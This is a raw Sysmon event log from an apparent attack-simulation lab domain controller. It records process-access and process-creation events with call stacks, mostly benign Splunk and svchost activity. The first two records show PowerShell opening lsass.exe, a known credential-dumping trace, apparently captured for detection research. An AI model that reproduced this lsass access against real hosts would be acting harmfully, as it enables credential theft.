13:34:22.191{59A5CD1D-8E44-6005-0B00-00000000A301}856100C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.191{59A5CD1D-8E44-6005-0B00-00000000A301}856100C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.869{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.954{59A5CD1D-8E5F-6005-7000-00000000A301}31043876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5F-6005-7000-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 